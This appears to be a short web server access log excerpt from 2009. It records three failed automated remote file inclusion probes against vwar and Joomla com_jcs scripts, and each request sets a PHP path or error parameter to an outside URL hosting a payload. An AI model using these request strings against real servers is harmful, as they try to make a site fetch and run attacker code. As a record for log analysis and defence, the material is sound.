61.63.4.74 - - [07/Sep/2009:03:40:28 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [07/Sep/2009:03:44:22 -0700] "GET /logs//components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
99.198.106.178 - - [07/Sep/2009:03:44:22 -0700] "GET /components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
